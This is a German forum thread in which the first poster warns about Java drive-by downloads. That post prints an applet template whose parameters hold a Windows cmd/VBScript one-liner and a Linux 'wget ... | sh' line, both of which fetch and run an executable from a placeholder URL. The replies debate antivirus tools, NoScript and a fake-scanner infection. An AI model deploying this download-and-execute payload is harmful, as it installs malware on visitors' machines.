Suche im Forum:
Suchen


« Vorheriges Thema anzeigen :: Nächstes Thema anzeigen »  
Autor Nachricht
Beitrag20.11.2010 um 14:33 (UTC)    
Titel: Drive By?

Lieber User, ich bitte dich SEHR das durchzulesen wenn du nicht weisst was ein Drive By ist & kommentieren!

Zitat:
Ein Drive-by-Download bezeichnet das unbewusste (engl. Drive-by: im Vorbeifahren) und unbeabsichtigte Herunterladen (Download) von Software auf den Rechner eines Benutzers. Unter anderem wird damit das unerwünschte Herunterladen von Schadsoftware allein durch das Anschauen einer dafür präparierten Webseite bezeichnet.[1][2] Dabei werden Sicherheitslücken eines Browsers ausgenutzt, denn definitionsgemäß ist mit HTML-Inhalten und Browser-Skriptsprachen ein Zugriff außerhalb der Browser-Umgebung nicht möglich.[3]
Quelle: Wikipedia

Es gibt seit diesem Jahr viele Drive By Viren.
Egal ob Pornoseiten, Bildergallerien oder sonstiges, Sie bestehen aus einem Drive By.

Was ist der berühmteste Drive By Trick?

Java Drive By's. Geht man auf eine Website drauf & bestätigt das man via Java es zulässt diese Anwendung zu starten wird automatisch der Virus gestartet.

Wie lautet der Code von einem Javadriveby / Javaexploit?

Zitat:
<applet width='500' height='500' code='Client.class' archive='Beispiel.jar'>
<param name='windows1' value='cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs http://google.de/virus.exe %temp%\update.exe'>
<param name='windows2' value=''>

<param name='unix1' value="">
<param name='unix2' value="">

<param name='linux1' value="wget http://google.de/virus.exe -O- | sh">
<param name='linux2' value="">

</applet>


Ich kontrolliere bevor ich auf eine Website gehe immer via QuellenText was ausgeführt etc. wird.

Warum der Theard?

Ich will euch helfen & warnen.


Zuletzt bearbeitet von clymsbox am 20.11.2010, 15:42, insgesamt 2-mal bearbeitet
Beitrag20.11.2010 um 17:06 (UTC)    
Titel:

Aha. Das bringt aber nichts ohne ein gutes antivir zb von pctools

Wieso posteet du aber dann auch einen code? Keiner schaut den 1000 e zeilen langenbquellcode an

Browser defender von pctools mywot etc
______________
Video Portal Unplugged
Neues Gewinnspiel #1
Neues Gewinnspiel #2
Beitrag20.11.2010 um 18:46 (UTC)    
Titel:

Auch ganz normale Antiviren Scanner, oder ein ordentliches System mit aktivierter Schutzfunktion verhindern solche Baustein Viren/exploits, drops, etc.

Es gibt einen Grund, warum solche Informationen so einfach zu erlangen sind, und so einfach abzuwehren sind.
Sie sind in 99.9% der Fälle nutzlos.
______________
Bored to infinity and beyond...
Beitrag20.11.2010 um 19:53 (UTC)    
Titel:

Ich hab mal 10 Virusprogramme getestet, davon hat keins angeschlagen. Das ist SEHR HILFREICH (oder hoffe ich Rolling Eyes)
Beitrag20.11.2010 um 21:35 (UTC)    
Titel:

Probier pctools internet security bzw antivir etc
______________
Video Portal Unplugged
Neues Gewinnspiel #1
Neues Gewinnspiel #2
Beitrag20.11.2010 um 23:45 (UTC)    
Titel:

antivir hat neulich bei mir versagt -.- schwups hatte ich ne malware (think point) drauf, wüsste gern woher, da ich zu dem zeitpunkt keine unbekannte seite geöffnet habe und obwohl ich bei soetwas sehr übervorsichtig bin, naja darf jetzt das ganze bs wieder neuinstallieren und die komplete partition löschen... aber nebenbei isses mir gerade recht weil ich mir schon länger win7 zulegen wollte^^

btw: think point verwendet auch noch ganz hinterhältig das windows logo und sieht optisch auch als eine anwendung von MS aus. es lockt mit scheinbaren virenfunde aufm computer den user einen button zu klicken der das systeme scannt ( taskmanager, firefox IE etc, und andere programme die think point beeinflussen könnte werden mittlerweile schon geblockt ), betätigt hier diesen button installiert ihr euch selbst einen trojaner, ...der pc startet automatisch neu, es kommt direkt nach dem booten das thinkpoint fenster. erneut wird "gescannt", abbrechen lässt es sich nicht, 60$ kostet die "vollversion" mit der wieder alles laufen soll und die nichtvorhandenen viren beseitigt werden. lässt ihr euch darauf auch noch ein ist das geld futsch und ihr ladet euch satt einer vollversion 300 andere viren, trojaner, würmer etc runter.

an alle die jetzt denken mich triffts eh niemals, das dachte ich auch... Wink
______________
Born to be a N3rd
Beitrag21.11.2010 um 15:30 (UTC)    
Titel:

Wenn es dich getroffen hat, dann hast du einen gravierenden Fehler gemacht.

1 Möglichkeit: Unseriöse Websiten, bzw Halbwegs Seriöse Websiten mit guter besuchsrate *hustyoupornhust*, die dann durch Hacker mehr oder weniger darüber infiziert werden.

2 Möglichkeit: Antivirenprogramme. betonung auf Programme. Hab schon so viele aus meinem Bekanntenkreis gesehen, die 2 oder mehr Antivirensysteme installiert und aktiviert hatten. (Antivir, Kaspersky und McAffe simultan beispielsweise)

3 Möglichkeit: Versagen eigener gesunden Menscheneinstellung.
Meistens ist ein Virus oder ein sonstiges Schädlingsprogramm (in diesem Fall Code) mit gesundem Menschenverstand zu identifizieren. Wenn du also etwas installiert gekriegt hast, und es nicht blocken konntest, bedeutet das ja schonmal, dass du erstens den Auslöser enteckt hast, und zweitens das Schädlingsprogramm an sich. Wer es dann versucht zu bekämpfen, während er sich nicht im Internet schlau macht, bzw sehr bekannte "born-to-kill" programme wie IceSword oder WipeOut benutzt ist auch schon ein bisschen selber schuld. Wer weiß was passiert, wie, und warum, sollte in der Lage sein, sich mit dieser Situation zurechtzufinden.

Zitat:
lässt ihr euch darauf auch noch ein ist das geld futsch und ihr ladet euch satt einer vollversion 300 andere viren, trojaner, würmer etc runter.

Und wenn du damit auch darauf anspielst, dass du wirklich dafür bezahlt hast, dann ist eh alles zu spät.
Und nicht nur vom technischen her.
______________
Bored to infinity and beyond...
Beitrag21.11.2010 um 16:58 (UTC)    
Titel:

"Und nicht nur vom technischen her." ich würde mir doch ein bisschen mehr respekt wünscher herr soft-air-ranger

1.ich weiss was ich getan habe, als ich die meldung bekam war ich auf facebook und vimeo, und auf keine deiner gehusteten pornoseite und desweiteren wundert es mich nicht das du über die gute besucherrate bescheid weisst -.- ( ich hab sowas auch nicht nötig, ich hab noch ein leben ausserhalb dieser i-net welt )

2. ich hab antivir das war ziemlich zuverlässig und war auch zufrieden damit

3. siehe punkt 1 und obwohl ich sogar adblock benutzte hat sich dieses fenster geöffnet.

nein bezahlt habe ich nicht und genauso wenig am anfang gescannt... habs später noch gegoogelt und mich schlau gemacht. aus prinzip: was wenn...

ich glaube dir ist gar nicht bewusst was du hier unterbreitest da du wahrscheinlich noch nicht mit soetwas erfahrung gemacht hast mit deinen superprogrammen und fantastischen 500 antivirprogs bei denen selbst ein virus kein platz mehr auf deiner festplatte mehr findet.

und für diese 3 vermutungen ( die mich überhaupt gar nicht interessiert hätten, mal so nebenbei ) hättest dir wohl die abnutzung deiner tatstatur sparen können.
______________
Born to be a N3rd
Beitrag21.11.2010 um 19:55 (UTC)    
Titel:

Habe Antivir selber, und habe mal einen test in einer VBox gemacht, mit neuester Antivir Version und Firefox.
- Scan-Popup
- Scannen (Y/N)
- Y
- Antivir meldung Trojaner erkannt.
- Isoliert
- Entfernt


Zitat:
ich weiss was ich getan habe, als ich die meldung bekam

Es kam die imitierte Microsoft Security Essentials Meldung, zum System scan, wo du doch Antivir installiert hattest, und du hast zugestimmt?
Warum? Würde mich interessieren.

Zitat:
ich glaube dir ist gar nicht bewusst was du hier unterbreitest


Doch, und ich entschuldige mich schonmal für das Youporn Unterjubeln, das war dann wohl doch fehl am Platz.

Und was die Superprogramme angeht, läuft bei mir auch nur Antivir, und meine Firewall.

Greetz
______________
Bored to infinity and beyond...
Beitrag21.11.2010 um 20:37 (UTC)    
Titel:

ab da konnte ich nichts mehr machen wie schon oben erwähnt, sogar den pc runterfahren konnte ich nicht, ich stimmte natürlich nicht zu (siehe oben nach punkt 3), sondern zog den stecker und startete neu...
______________
Born to be a N3rd


Zuletzt bearbeitet von aka-design am 21.11.2010, 21:51, insgesamt einmal bearbeitet
Beitrag21.11.2010 um 21:35 (UTC)    
Titel:

gameshop hat Folgendes geschrieben:
Aha. Das bringt aber nichts ohne ein gutes antivir zb von pctools

Wieso posteet du aber dann auch einen code? Keiner schaut den 1000 e zeilen langenbquellcode an

Browser defender von pctools mywot etc


Quatsch nicht. NoScript für Firefox reicht vollkommen, zumindest um die Sicherheit im Browser zu gewährleisten.
______________
*** Signatur editiert vom Support Team - Signatur zu groß - max. 650 x 150 px ***
Beitrag22.11.2010 um 00:45 (UTC)    
Titel:

Hmm..

<ot>

http://creativecommons.org/licenses/by-sa/3.0/de/legalcode
http://de.wikipedia.org/wiki/Wikipedia:Lizenzbestimmungen/alt_GFDL#F.C3.BCr_Artikel

</ot>

Achja.. solche Pseudosicherheitsexperten sind immer die schönsten.
So nach dem Motto:
"Ich habe xyz Antivirenprogramme benutzt und nichts hat geholfen. Daher ist mein Tipp überlebenswichtig!"

*roll*
Ich bezweifle, dass der Allgemeinnutzer nur aus Sicherheitsgründen sich einen Aufwand machen, den Quelltext zu durchsuchen - vor allem, weil viele das auch nach diesem Thread nicht verstehen werden.
Sollte auch nicht nötig sein. absolute Sicherheit ist es nach wie vor nicht. Richtig harte Malware entdeckst du so einfach im Quelltext nicht.
Interessant dafür wär vllt auch http://www.heise.de/thema/Tatort-Internet

Ich vertraue da selbst auch lieber Erweiterungen wie AdBlock, NoScript und WOT. Ebenso eine für mich angepasste Firewall und Antiviren- und AntiSpyware-Programm.
Ich werd' bestimmt nicht, weil trotzdem noch etwas durchgelangen könnte, paranoid jeden Quelltext vorher auf jede Kleinigkeit abchecken.

Wenn du in ein Lebensmittelgeschäft gehst.. durchsuchst du jeden.. Artikel, ob es vielleicht vergiftet ist?
Irgendwo sollte die Paranoia aufhören.
______________


Zuletzt bearbeitet von AsgarSerran am 22.11.2010, 01:51, insgesamt einmal bearbeitet
Beitrag22.11.2010 um 08:46 (UTC)    
Titel:

am besten ist immer noch pc tools die software von denen zb auch browser defender, internet security, spyware doctor, antivir, firewall, Alternate Operating System Scanner, Mebroot Fixtool ...

besseres gibts wirklich nicht =)
...
______________
Video Portal Unplugged
Neues Gewinnspiel #1
Neues Gewinnspiel #2
Beitrag22.11.2010 um 13:56 (UTC)    
Titel:

Sind wir uns einig das es jetzt wichtig ist für die User? Rolling Eyes Anstatt jetzt Streit oder so zu haben. Ich habe >50 Beispiel Pornoseiten jetzt angesehen, nein da waren keine Pornos xD > JavaLoad, in Chats wie bei webkicks, knuddels, habbo oder was weiss ich wird auch damit Werbung gemacht. Es fallen jedoch viele druaf rein!
Beitrag22.11.2010 um 15:54 (UTC)    
Titel:

Oehm nein, der Thread ist nicht wichtig für die User.
______________
Beiträge der letzten Zeit anzeigen:   


Powered by phpBB © 2001, 2005 phpBB Group
Deutsche Übersetzung von phpBB.de